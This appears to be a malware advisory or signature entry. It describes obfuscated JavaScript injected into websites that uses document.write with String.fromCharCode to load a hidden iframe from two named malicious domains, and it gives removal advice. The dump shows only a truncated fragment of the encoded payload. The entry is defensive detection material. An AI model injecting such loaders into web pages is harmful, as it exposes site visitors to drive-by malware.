Description:
Malware identified and encoded inside a "document.write(String.fromCharCode" call. It is used to call an external and malicious iframe file, while making it hard to find.
Loads malware from:
campusok.net
www.dijoo.com
Affecting:
Any type of web site (no specific target).
Clean up and details:
Remove offending line from the javascript file.
Malware dump:
document.write(String.fromCharCode(60,105,102,114,97,109,101,...;